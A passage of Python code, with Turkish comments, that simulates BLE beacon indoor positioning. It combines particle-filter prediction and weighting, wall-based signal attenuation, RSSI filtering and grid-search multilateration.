ylow = np.maximum(ymin,self.beacon_pos[1]-movingLimit)-self.beacon_pos[1]
yhigh =np.minimum(ymax, self.beacon_pos[1]+movingLimit)-self.beacon_pos[1]
while True:
walking_noise_x = np.random.uniform(low=xlow,high=xhigh) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh)
#walking_noise = np.zeros(particles.shape)
walkingNoise=np.array( (walking_noise_x,walking_noise_y)).T
#walkingNoise=np.random.uniform(-movingLimit,movingLimit,size=(2,))
if self.prev_walkingNoise is not None:
walkingChoices=[walkingNoise,self.prev_walkingNoise]
walkingNoise = np.copy(walkingChoices[ np.random.choice([0,1], p=(1-prevMotionRepeatProb,prevMotionRepeatProb)) ] ) # choose the prev motion with a higher probability
tmpBeaconPos=self.beacon_pos + walkingNoise + movingTendency
#print "beacon pos is: " + str(self.beacon_pos)
#print "walkingNoise is: " + str(walkingNoise)
isCollision=not checkIfCoordinateIsInMap(tmpBeaconPos, OOIWidth,OOIHeight)
if not isCollision:
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,blockPosition,blockWidth,blockLength) is not None :
isCollision=True
break
if not isCollision:
for roomPosition in roomPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomBoundary) or \
indRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,roomPosition,roomWidth,roomLength) is not None :
isCollision=True
break
if not isCollision:
break
self.prev_walkingNoise=np.copy(walkingNoise)
self.beacon_pos = np.copy(tmpBeaconPos)
# use constant velocity model described in page 32
# yurumek icin mu 0.5 metre olur, std ise 0.2m falan.
# O zaman variance 0.04 m2 diyebiliriz
# p(x_t| x{t-1}), su sekilde hesaplanabilir, p(x_t) icin gaussian hesapla, sonra p(x_{t-1} icin hesapla p(x_t,x{t-1} = p(x_t| x{t-1}) * p(x_{t-1} demek) )
# 2 prob'un ayni anda bulunmasi demek yani bu
# 2 prob'un altta kalan alani, bu area'yi p(x_{t-1}'e bolersek sonucu buluruz) )) -> bu da page 32'deki formule tekabul ediyor(bolmek demek exp'lerin cikarilmasi demek)
# velocity icin ise x(t-1) ve x(t-2) verilmeli bunlar default'u None olacak, ve eger biri dahi None ise velocity hesaplanamayacagindan ilk oncelerde bunlar
# hesaba katilamdan prediction yapacagiz, yani brownian motion olmus olacak.
# 32'deki d'nin ne oldugunu tam anlayamadim, ben 1 kabul edecegim onu direkt olarak.
# x_prev = x(t-1)
# x_pp = prev of x_prev
def predict_BLE( self, no_of_noise_elements, movingLimit, pastCoeff, xdims, ydims, movingTendency=np.array([0,0]) ):
#rand_gaussian_noise=np.random.multivariate_normal(mu=mu,cov=sigma,size=no_of_noise_elements) # Draw random samples from a multivariate normal distribution
#rand_gaussian_noise = 0
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
# ALL PARTICLES SHOULD RESIDE IN THE MAP, CHECK FOR BEING INSIDE FOR EACH PARTICLE (MOVE THAT AMOUNT AT THE BORDERS AT MAX)
# min of x, should not be lower than map's xmin && max of x should not be larger than map's xmax
# meaning low should be max(xmin,particles[:,0]-xmin-movingLimit) && high = min(xmax, xmax-particles[:,0]+movingLimit)
xlow = np.maximum(xmin,self.particles[:,0]-movingLimit)-self.particles[:,0]
xhigh =np.minimum(xmax, self.particles[:,0]+movingLimit)-self.particles[:,0]
ylow = np.maximum(ymin,self.particles[:,1]-movingLimit)-self.particles[:,1]
yhigh =np.minimum(ymax, self.particles[:,1]+movingLimit)-self.particles[:,1]
walking_noise_x = np.random.uniform(low=xlow,high=xhigh,size=self.particles.shape[0]) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh,size=self.particles.shape[0])
##print "walking_noise_x is: " + str(walking_noise_x)
#walking_noise = np.zeros(particles.shape)
walking_noise_x=np.array(walking_noise_x)
walking_noise_y=np.array(walking_noise_y)
walking_noise=np.array( (walking_noise_x,walking_noise_y)).T
if np.count_nonzero(self.x_prev) != 0 and np.count_nonzero(self.x_pp) != 0:
past_velocity = self.x_prev - self.x_pp
change_in_pos = (1-pastCoeff) * walking_noise + pastCoeff * past_velocity # constant_velocity_motion
else:
change_in_pos = walking_noise
#particles +=
self.particles += change_in_pos + movingTendency
# Update the weight of the particles according to the measured beacon position found in the multilateration algorithm for the current time step
def update_weights(self):
distances = np.linalg.norm(self.particles - self.averaged_beacon_pos, axis=1)
self.weights *= np.sum(distances)/distances
# SET ALL WEIGHTS INTERSECTING WITH AN OBSTRUCTION TO ZERO (so that particles do not accumulate on obstructions)
for particleIndex, particle in enumerate(self.particles):
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex,roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,roomPosition,roomWidth[roomIndex],roomLength[roomIndex],boundaryForRect=roomWallWidth[roomIndex]/2):
isCollision=True
break
if isCollision:
self.weights[particleIndex]=0
self.weights += 10**(-300) # avoid round-off to zero
self.weights /= sum(self.weights) # normalize
# Resample N_eff
def resample_from_higher_weights(self,tmp_particles, tmp_weights):
#indices = multinomial_resample(weights)
#indices = residual_resample(weights)
#indices = stratified_resample(weights)
indices = systematic_resample(self.weights)
tmp_particles[:] = tmp_particles[indices]
tmp_weights[:] = tmp_weights[indices]
tmp_weights.fill(1.0 / len(tmp_weights))
# maxSignalError in dBm
# it should call checkLineSegmentCollision_WithRectange, to lower signal if receiver and beacon is not in "Line of Sight"
def calc_RSSIs_to_Receivers(self,minSignalValue,minValidSignal,maxSignalError):
self.RSSIofReceivers[:] = []
self.UnprocessedRSSIofReceivers[:] = []
receiverIndex=0
for receiverPosition in self.receiverPositions:
res_unprocessedRSSI = 0
if(maxSignalError > 0):
res_unprocessedRSSI=weakenedSignal( distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos) ) , maxSignalError )
else:
##print "the norm is: " + str(np.linalg.norm(receiverPosition-self.beacon_pos ))
res_unprocessedRSSI=distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos ) )
#return max(-100,unprocessedRSSI) # Generally signals lower than -100 are not that reliable
isCollision=False
# this is used to weaken the signal in case there was a block or room between the receiver and the beacon(this is real calculation)
# this simulates the signal before we catch it in real life.
weakeningAmount=0 # distance between the receiver and the beacon / 1 meter * ( how many dBm to reduce for 1 meter)
for blockIndex, blockPosition in enumerate(blockPositions):
receiverBeaconBlockIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,blockPosition,blockWidth,blockLength)
if receiverBeaconBlockIntersection is not None:
#print "receiverBeaconBlockIntersection" + str(receiverBeaconBlockIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconBlockIntersection[0,:]-receiverBeaconBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ] * np.random.uniform(0.5,1.5) # +- some noise olsun
# her engel icin noise eklemek, gercek hayat icin de uygun olacaktir
# aslinda burada duvarin material'i ile de hareket etmeliyim. Coefficient'lar 1m icin idi sonucta
# distance/1 * coefficient , yani distance(in meters) * coefficient olmali
for roomIndex, roomPosition in enumerate(roomPositions):
receiverBeaconRoomIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,roomPosition,roomWidth,roomLength)
if receiverBeaconRoomIntersection is not None:
#print "receiverBeaconRoomIntersection" + str(receiverBeaconRoomIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconRoomIntersection[0,:]-receiverBeaconRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ] * np.random.uniform(0.5,1.5)
# * some coefficient(odada cok zayiflamasin), odadaki duvarlar kadar zayiflasa yeterli bu da odanin 8'de biri kadar falan olur(kestigimiz 2 duvari da dusunecek olursak)
strengtheningAmount=0 # (distance between the receiver and the mean of the particles) / 1 meter * ( how many dBm to reduce for 1 meter)
# the calculations below are not real. They are our prediction by looking at the mean value of the particles
# if the mean of the prev calculations and the beacons have a block or room in between, we better increase the signal
# this simulates after receiving the signal in real life (post processing of the signal)
isMeanReceiverCollision=False # this is used to strengthen the received signal in case there was a block in between previously
if self.mu is not None: #!= degildir kulanma cunku, array oldugu zaman burasi hata verir
for blockIndex, blockPosition in enumerate(blockPositions):
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
if isCollision:
##print "No Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
#res_unprocessedRSSI=( weakenedSignal(res_unprocessedRSSI,maxSignalError) + res_unprocessedRSSI ) / 2.0 #weaken a bit, but not weaken upto max signal error
res_unprocessedRSSI-=weakeningAmount
else:
pass
##print "Direct Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
res_processedRSSI=res_unprocessedRSSI
if isMeanReceiverCollision:
res_processedRSSI+=strengtheningAmount
##print "increased signal strength since there was a wall between the receiver and the beacon in the previous step according to our particle calculations"
# ONE MORE CHECK FOR SLIDING WINDOWS #
# each receiver should have a sliding window
# max slidingWindows size should be 7
slidingWindow = self.slidingWindows[receiverIndex]
while len(slidingWindow) >=7:
##print "prev size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.popleft() # delete oldest element
##print "after size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.append(res_processedRSSI) # appends at the right
##print "final size of the window is: " + str( len(self.slidingWindows) )
if self.filterAndCheckSignal(minValidSignal,receiverIndex) and res_processedRSSI > minSignalValue:
##print "filtering was successful"
self.RSSIofReceivers.append( res_processedRSSI )
self.UnprocessedRSSIofReceivers.append( res_unprocessedRSSI )
else:
##print "filtering was not successful"
self.RSSIofReceivers.append( None )
self.UnprocessedRSSIofReceivers.append( None )
receiverIndex+=1
def filterAndCheckSignal(self,minValidSignal,receiverIndex):
mean=0.0
sum=0.0
slidingWindow = self.slidingWindows[receiverIndex]
if len(slidingWindow) < 3:
return False
else:
noOutlierDeque=col_deque(sorted(slidingWindow) )
noOutlierDeque.popleft() # delete smallest
noOutlierDeque.pop() # delete greatest
for signalVal in noOutlierDeque:
sum+=signalVal
mean=sum/len(noOutlierDeque)
return mean >= minValidSignal
# if RSSI is lower than -90dBm , then omit this receiver ( assuming we use 0dBm signal powered beacons)
def setBeaconDistances_fromRSSIs(self,minValidSignal):
self.distToReceivers[:] = []
for RSSIofReceiver in self.RSSIofReceivers:
#print "rssi of receiver is: " + str(RSSIofReceiver)
if RSSIofReceiver is not None and \
RSSIofReceiver > minValidSignal:
self.distToReceivers.append( RSSI_to_distance( RSSIofReceiver ) + safetyOffset ) # add safetyOffset0 to avoid divide by zero in the custom_minimize function
else:
self.distToReceivers.append( None )
# NumberOfParticles for 4 RECEIVER
def multiLateration(self,xdims,ydims,sensitivityOfResult):
distToReceiversArray = np.array(self.distToReceivers)
receiverPositionsArray=np.array(self.receiverPositions)
##print "elements are : " + str( elements )
#resultingPoint = Trilaterate(rp1.coord,elements[0],rp2.coord,elements[1],rp3.coord,elements[2])
#resultingPoint = minimize_dist_error(elements,np.vstack(coordinates ),xdims,ydims )
#with open('deneme.txt', 'a') as the_file:
# the_file.write("beacon_pos is: " + str(self.beacon_pos) + "\n" )
#print "beacon_pos is: " + str(self.beacon_pos)
# if checkForBlocks == True, it also considers blocks for minimization in the disadvantage of time consumption
# checkForBlocks means include None info to make multi lateration calculations
resultingPoint = custom_minimize(self.UnprocessedRSSIofReceivers,distToReceiversArray,np.vstack(receiverPositionsArray ),xdims,ydims,sensitivityOfResult,checkForBlocks=True )
return resultingPoint
def calc_PDF(self,strongSignalDistance,pastCoeff):
numberOfNotNones=0
numberOfStrongSignals=0
confidenceEllipseMultiplier=1
for distToReceiver in self.distToReceivers:
if distToReceiver is not None:
numberOfNotNones+=1
#print "dist to receiver is: " + str(distToReceiver)
if distToReceiver < strongSignalDistance:
numberOfStrongSignals+=1
"""returns mu and variance of the weighted particles"""
self.mu = np.average(self.particles, weights=self.weights, axis=0)
#var = np.average((particles - mu)**2, weights=weights, axis=0)
self.covMatrix = np.cov(m=self.particles, rowvar=False, aweights=self.weights) # rowvar has to be False otherwise each row represents a variable, with observations in the columns.
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.cov.html
self.max_weighted_particle = self.particles[np.argmax(self.weights) ]
if numberOfNotNones >=3:
if numberOfStrongSignals >= 3:
confidenceEllipseMultiplier=1 # No change
elif numberOfStrongSignals == 2:
confidenceEllipseMultiplier=1.25
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=1.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=2
# x1.6 worse than the >=3 case
elif numberOfNotNones == 2:
if numberOfStrongSignals == 2:
confidenceEllipseMultiplier=2
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=2.4
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=3.2
# x3 worse than the >=3 case
elif numberOfNotNones == 1:
if numberOfStrongSignals == 1:
confidenceEllipseMultiplier=4.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=6.0
# x5 worse than the >=3 case
else: # numberOfNotNones == 0:
#confidenceEllipseMultiplier=float("inf") # boyle olunca hic cizmesin ellipse
confidenceEllipseMultiplier=10.0 # 10.0 max'imiz olsun mesela
self.covMatrix*=confidenceEllipseMultiplier
# if pastCoeff == 1, o zaman ilk tur harici covMatrix hep prev'e esit olacak. Yani ilk turda buldugu covariance hep esas algidi olmus olacak
if self.prevCovMatrix is not None:
self.covMatrix=self.covMatrix*(1-pastCoeff) + pastCoeff*self.prevCovMatrix
# circle center, circle radius, 2 ends of line segment
def findEllipseLineSegmentIntersectionPoints(ellipseCenter,width,height, p1,p2):
if ( np.array_equal(p1,p2) ):
return None
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
line = LineString([p1,p2])
if ellipse.intersects(line):
intersectionPointObject = ellipse.intersection(line)
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
#print "ellipse line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
def checkFirstRectangleContainsSecondRectangle(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.contains(rectangle2)
def checkRectangleRectangleIntersection(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.intersects(rectangle2)
# circle center, circle radius, 2 ends of line segment
def checkEllipseRectangleIntersection(ellipseCenter,width,height, rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
#print "bottomLeftCorner is: " + str(bottomLeftCorner)
#print "topRightCorner is: " + str(topRightCorner)
#print "room position is " + str(rectCenter)
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return ellipse.intersects(rectangle)
def checkPointInsideRectangle(point,rectCenter,rectWidth,rectLength,boundaryForRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
point = Point(point)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return point.intersects(rectangle)
# if line intersects the rectangle only at 1 point(which could be the rectangle's corner, then we can return None since there is almost no intersection)
# it may intersect at infinite points for points in the same line with an edge(but since it only)
# bunun disinda x,y kontrolu yaparken odanin icinde hic olma ihtimallerini dusurecek cunku oda icindeki point'ler hep kesiiyor olacak ne kadar kalinligi varsa artik
# aslinda odanin icine girme mevzusunu bu handle etmiyor(cunku odanin icine giremiyor benim yesil beacon'im ama girebilse intersection kontrolu oda icerisinde olmamali)
# aslidna line segment yani x,y oda icerisinde ise hic kabul etmemeli bu x,y'i(simulasyon geregi burada olamaz ama simdilik odalara girilmiyor diye kabul ediyorum)
# simdilik oda icerisindeki noktalar az da olsa cezalandiriliyor boyle kalsin artik cok yakinlasamayacagimiz icin zaten buradaki noktalarin sansi dusuk
# sonsuz intersection ve tekli intersecitno'lari engellesek yeter simdilik
# aslinda contains de sonsuz noktada kesiiyor demek, demek ki sonsuz nokta kesisiminde line'in kesisen ilk ve son noktalarini veriyor
# belki de rectangle'in icini bos kabul ediyor, odanin icerisindekileri de hic cezalandirmiyoruz bilemiyorum
def findRectangleLineSegmentIntersectionPoints(p1,p2,rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
if np.array_equal(p1,p2):
return None
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
line = LineString([p1,p2])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
#print "findRectangleLineSegmentIntersectionPoints"
if rectangle.intersects(line):
intersectionPointObject = rectangle.intersection(line)
#print intersectionPointObject.coords[0]
#print intersectionPointObject.coords[1]
#print np.array(intersectionPointObject.coords).shape
if np.array_equal(np.array(intersectionPointObject.coords).shape,np.array([2, 2])):
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
#print "rectangle line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
def generateRandomMACID():
return ':'.join('%02x'%np.random.randint(0,256) for _ in range(6))
# zayiflamasina ragmen bir istasyona gelen sinyal guclu ise, bu sinyal diger zayif sinyallerden daha degerli
# bu yukaridazden distToReceivers degeri kucuk olan bir sinyal bizim icin daha cok anlama ifade ediyor
# bu degeri kucuk olan istedigimiz icin bu deger ile carparsam o sum daha kucuk olur, bizim istedigimizi elde ihtimalimiz artar
# multilateratiion icin check edecegimiz [x,y] noktasi, eger ble fingerprinting result'taki ile +-2dBm'den fark ediyorsa cezalandir. Bu noktalarin olma ihtimali daha az cunku
def custom_minimize(UnprocessedRSSIofReceivers,distToReceivers, receiverPositions,xdims,ydims,sensitivityOfResult=1.0,checkForBlocks=True):
mysum=float("inf")
maxCatchableSignalDistance = RSSI_to_distance( minValidSignal ) + safetyOffset
#print "maxCatchableSignalDistance is: " + str(maxCatchableSignalDistance)
resultingPoint=[-1,-1]
for x in np.arange(xdims[0],xdims[1],sensitivityOfResult):
for y in np.arange(ydims[0],ydims[1],sensitivityOfResult):
# if x,y collides with a block or room, this position would not be possible
isPointOnObstacle=False
for blockPosition in blockPositions: # it will not enter this loop if there are no blocks
if checkPointInsideRectangle([x,y],blockPosition,blockWidth,blockLength):
isPointOnObstacle=True
break
if not isPointOnObstacle:
for roomPosition in roomPositions:
if checkPointInsideRectangle([x,y],roomPosition,roomWidth,roomLength):
isPointOnObstacle=True
break
if isPointOnObstacle:
continue # this point cannot be what we are looking for
tmp_sum=0
for i in range(len(receiverPositions)):
#with open('deneme.txt', 'a') as the_file:
# the_file.write("receiverPositions is : " + str(receiverPositions[i]) + "\n" )
# the_file.write("distToReceivers is : " + str(distToReceivers[i]) + "\n")
if distToReceivers[i] is not None:
tmp_sum+=( abs( np.linalg.norm( [x,y] - receiverPositions[i] ) - distToReceivers[i] ) /distToReceivers[i] ) ** 2
#if abs( UnprocessedRSSIofReceivers[i] - interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y] ) > 5: # if the difference is more than 5 dBm:
#tmp_sum+=( abs( UnprocessedRSSIofReceivers[i] - interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y] ) / 5 ) ** 2
else: # distToReceivers[i] None ise, [x,y]'intersection receiver'imiza belli yakinliktan fazla yakin olmasi imkansiz olmali(bundan daha yakin ise cezalandir)
# [x,y], receiverPositions[i]'ye ne kadar yakinda o kadar cezalandir
# distToReceivers[i] bizim belirledigimiz bir sey zaten tahminimiz yani. Biz bunun yerine mesela 10m koyabiliriz bundan ne kdar deviate etmis diye
# ama bizim icin ne kadar yakinda o kadar kotu cunku biz belirli bir uzaklik tahmin ediyoruz, o yuzden 1/distToReceivers yerine 1/ ( [x,y]-receiverPositons) koyalim
if checkForBlocks:
strengtheningAmount=0
for blockIndex, blockPosition in enumerate(blockPositions): # it will not enter this loop if there are no blocks
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
# when tryin all possible x and y, this x and y should not be equal to the receivers position, since it would not be a line
# if it is equal to the receivers position, the intersection should return None
# so findRectangleLineSegmentIntersectionPoints function should return None if points to make the lines are equal
# also if intersection is at a corner(which means intersect only at 1 point, then it should return None for this case as well since intersection dist would be zero already)
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
maxCatchableSignalDistance = RSSI_to_distance( minValidSignal + strengtheningAmount) + safetyOffset
if np.linalg.norm( [x,y] - receiverPositions[i] ) < maxCatchableSignalDistance: # we see it as None, so it should not be closer than maxCatchableSignalDistance. If so, then punish
tmp_sum+=( abs( np.linalg.norm( [x,y] - receiverPositions[i] ) - maxCatchableSignalDistance ) / ( np.linalg.norm( [x,y] - receiverPositions[i] ) + safetyOffset ) ) ** 2
# yukarida gercekte ne kadar yakinsa , ne kadar uzak buluyorsak o kadar cezalandiriyorduk
# burada ne kadar yakindaki [x,y]'yi kontrol ediyorsak o kadar cezalandiyoruz, cunku gercekte uzak olmasi gerektigini dusunuyoruz(sadece 1/ ... kisimlari farkli)
#with open('deneme.txt', 'a') as the_file:
# the_file.write("x,y is : " + str([x,y]) + "\n" + "sum is: " + str(tmp_sum) + "\n")
if tmp_sum < mysum:
mysum = tmp_sum
resultingPoint=[x,y]
##print "x,y is : " + str([x,y])
##print "sum is: " + str(tmp_sum)
##print "receiverPositions are" + str(receiverPositions)
##print "distToReceivers are " + str(distToReceiversArray)
##print "the sum is : " + str(mysum)
#with open('deneme.txt', 'a') as the_file:
# the_file.write("resultingPoint is : " + str(resultingPoint) + "\n")
return resultingPoint
# after signal transmitted, maybe the signal hit a wall and reduced in strength/
# since we cannot manipulate after transmittion is node, we reduce the signal when transmitting assuming it will hit something by a posibility
# We have to increase it by a possibility
def weakenedSignal(RSSI,maxSignalError):
return RSSI - uniform(0,maxSignalError)
def create_uniform_particles(x_range, y_range, NumberOfParticles):
particles = np.empty((NumberOfParticles, 2))
particles[:, 0] = uniform(x_range[0], x_range[1], size=NumberOfParticles)
particles[:, 1] = uniform(y_range[0], y_range[1], size=NumberOfParticles)
return particles
# for each receiver hold a separate signal strenght map
# each beacon should have its interpolation all around the map. Then we we should take weighted average of these beacons signal strengths values
# For example, FOR RECEIVER 1, if beacon1 is at [5,5] and beacon2 is at [10,3] and the point that we want to interpolate is at [10,5]. Beacon2 should have higher vote to determine signal strength
# signal strength values of the beacons (fingerpritn positions) are different for each receiver, therefore for each receiver we should hold another map info
def interpolateFingerPrintingResult():
xElems=np.arange(xdims[0],xdims[1],sensitivityOfResult)
yElems=np.arange(ydims[0],ydims[1],sensitivityOfResult )
allPosDistancesToReceivers={} # make it a dictionary where the key is 2d position
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
allPosDistancesToReceivers[i,x,y]=np.linalg.norm(receiverPositions[i]- [x,y])
numberOfBeacons=fingerPrintingSignalStrengthBeaconsToReceivers.shape[1]
allPosDistancesToBeacons={} # make it a dictionary where the key is 2d position
for k in range(numberOfBeacons):
for x in xElems:
for y in yElems:
